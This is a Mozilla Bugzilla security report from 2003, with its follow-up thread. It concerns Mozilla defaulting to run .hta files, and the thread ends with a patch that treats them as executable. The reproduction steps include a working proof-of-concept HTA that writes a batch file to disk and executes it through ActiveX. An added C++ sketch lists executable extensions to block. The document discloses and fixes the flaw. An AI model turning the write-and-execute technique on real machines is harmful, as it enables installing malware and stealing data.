Bug 220257 - Mozilla favors writing/executing on harddisk, using .hta files
Status: RESOLVED FIXED
[sg:fix]
: fixed1.4.2, fixed1.5
Product: Core
Classification: Components
Component: File Handling
: Trunk
: x86 Windows 2000
: -- critical
: mozilla1.6alpha
Assigned To: Christian :Biesinger (don't email me, ping me on IRC)
Reported: 2003-09-25 04:09 PDT by Bernd Heinze
Modified: 2004-05-25 14:52 PDT
brendan: blocking1.4.2+

Attachments
patch (1.15 KB, patch)
2003-09-25 05:11 PDT, Christian :Biesinger (don't email me, ping me on IRC)
darin.moz: review+
bzbarsky: superreview+
brendan: approval1.4.2+
asa: approval1.5+

Description Bernd Heinze 2003-09-25 04:09:14 PDT
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; de-AT; rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; de-AT; rv:1.4) Gecko/20030624

Due to a bug in Internet Explorer, .hta files can write and execute files on the
hard disk. When Mozilla loads an hta file for the first time, it asks the user what
to do with it, and defaults to run and don't ask again. Most users who don't know
what hta is and who don't know about the bug in Internet Explorer will hit OK
because they think it's safe. I also thought that Mozilla was safe regarding bugs
like this, but a dialer that installed automatically on my system proved me wrong.

Reproducible: Always

Steps to Reproduce:
1. Create the following file test.hta on your hard disk:
<html><head><hta:application id=hta_note_id
  applicationName=hta_note_name
  showInTaskBar=no
  caption=no
  innerBorder=no
  selection=no
  scroll=no
  contextmenu=no />
<script language=javascript>
  window.resizeTo(0, 0);
  window.moveTo(0, 0);
</script>
</head>
<body>
<script language=vbscript>
  h0 = "pause"
</script>
<script language=javascript>
  var fs = new ActiveXObject('Scripting.FileSystemObject');
  var ts = fs.CreateTextFile("c:\\test.bat", true, false);
  ts.Write(h0);
  ts.Close();
  var wsh = new ActiveXObject('WScript.Shell');
  wsh.Run("c:\\test.bat");
  window.close();
</script></body></html>
2. Drag the file into Mozilla
3. a) If it's the first time Mozilla loads an application/hta file, a window
will pop up asking what to do, which defaults to run, and don't ask again. Click OK
b) If there is already an entry for application/hta, Mozilla does what is specified
(probably the default setting)
4. Enjoy the message
Actual Results:  
Program on harddisk that can do anything. Delete data, spy out passwords

Expected Results:  
Mozilla should treat application/hta files like .exe files. Don't ask, don't
run, just save them on harddisk. The user can run them manually if he really
wants to.
Comment 1 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-25 05:06:09 PDT
ok... taking
Comment 2 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-25 05:11:24 PDT
Created attachment 132136
patch
Comment 3 Bernd Heinze 2003-09-25 07:25:02 PDT
Thank you for working so quickly on this bug. I looked at the patch and to me it
seemed like it only checks the file extension. Does that mean that this link
still works?
http://www.heise.de/security/dienste/browsercheck/demos/ie/htaalert.php
This link seems like a (harmless) PHP file but is in reality a (harmless)
exploit delivered as "application/hta".
Comment 4 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-25 07:38:10 PDT
No, that doesn't work either. The checked file extension is the final one, which
is also .hta in this example.
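
A sketch of the kind of final-extension check comment 4 describes, added here as an illustration; it is not the code from attachment 132136 or from nsLocalFileWin.cpp. The function names and the extension list are assumptions, and the stripping of trailing dots and spaces goes beyond what the thread discusses.

```cpp
#include <algorithm>
#include <array>
#include <cctype>
#include <iostream>
#include <string>

// Constructed deny list for illustration only; "hta" is the entry this bug adds,
// the other entries are assumptions and not the list in nsLocalFileWin.cpp.
static const std::array<const char*, 6> kExecutableExts = {
    "bat", "cmd", "com", "exe", "hta", "scr"};

// Lower-cased final extension of a leaf name, without the dot ("" if none).
// Trailing dots and spaces are dropped first, because Win32 path
// normalization ignores them and "a.hta. " would open as "a.hta".
std::string FinalExtension(std::string leaf) {
    while (!leaf.empty() && (leaf.back() == '.' || leaf.back() == ' '))
        leaf.pop_back();
    const std::string::size_type dot = leaf.rfind('.');
    if (dot == std::string::npos)
        return "";
    std::string ext = leaf.substr(dot + 1);
    std::transform(ext.begin(), ext.end(), ext.begin(), [](unsigned char c) {
        return static_cast<char>(std::tolower(c));
    });
    return ext;
}

// True when the name must be saved rather than launched.
bool IsExecutableLeaf(const std::string& leaf) {
    const std::string ext = FinalExtension(leaf);
    return std::any_of(kExecutableExts.begin(), kExecutableExts.end(),
                       [&ext](const char* e) { return ext == e; });
}

int main() {
    // Constructed sample names.
    for (const char* name : {"test.hta", "invoice.pdf.HTA", "test.hta. ",
                             "notes.hta.txt", "hta"}) {
        std::cout << name << " -> "
                  << (IsExecutableLeaf(name) ? "save only" : "may open") << "\n";
    }
    return 0;
}
```

Only the last extension decides the result, so a name such as notes.hta.txt is not flagged while invoice.pdf.HTA is.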
Comment 5 Boris Zbarsky [:bz] 2003-09-25 08:16:48 PDT
Comment on attachment 132136
patch

sr=bzbarsky
Comment 6 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-26 05:57:05 PDT
Checking in nsLocalFileWin.cpp;
/cvsroot/mozilla/xpcom/io/nsLocalFileWin.cpp,v  <--  nsLocalFileWin.cpp
new revision: 1.108; previous revision: 1.107
done
Comment 7 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-26 05:59:54 PDT
Comment on attachment 132136
patch

would be nice to get this security fix into 1.5 and 1.4.2, too...
it just makes it so that .hta files are also considered executable, should be
very low risk.
Comment 8 Bernd Heinze 2003-09-26 06:38:33 PDT
Is it already too late for 1.4.1?
Comment 9 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-26 08:16:25 PDT
to my knowledge, it is.
Comment 10 Brendan Eich [:brendan] 2003-09-29 11:01:38 PDT
I think this should get fixed on the 1.4 branch.  I'm recommending it for 1.5
also, but I'll let another driver mark the bug blocking1.5.

/be
Comment 11 Asa Dotzler [:asa] 2003-09-29 11:06:20 PDT
Comment on attachment 132136
patch

a=asa (on behalf of drivers) for checkin to the 1.5 branch.
Comment 12 Christian :Biesinger (don't email me, ping me on IRC) 2003-09-29 12:42:53 PDT
looks like brendan already checked this into the 1.5 branch
Comment 13 Brendan Eich [:brendan] 2003-09-29 12:45:59 PDT
Yes, sorry -- thought I updated this bug (I switched machines and may have left
a bugzilla login screen up).

/be
Comment 14 Christopher Aillon (sabbatical, not receiving bugmail) 2003-11-24 07:30:29 PST
Opening.
Comment 15 Brendan Eich [:brendan] 2003-11-27 10:41:29 PST
Comment on attachment 132136
patch

Please check into the 1.4 branch.

/be
Comment 16 Christian :Biesinger (don't email me, ping me on IRC) 2003-11-27 14:51:09 PST
fixed on 1.4 branch
Checking in nsLocalFileWin.cpp;
/cvsroot/mozilla/xpcom/io/nsLocalFileWin.cpp,v  <--  nsLocalFileWin.cpp
new revision: 1.102.2.2; previous revision: 1.102.2.1
done
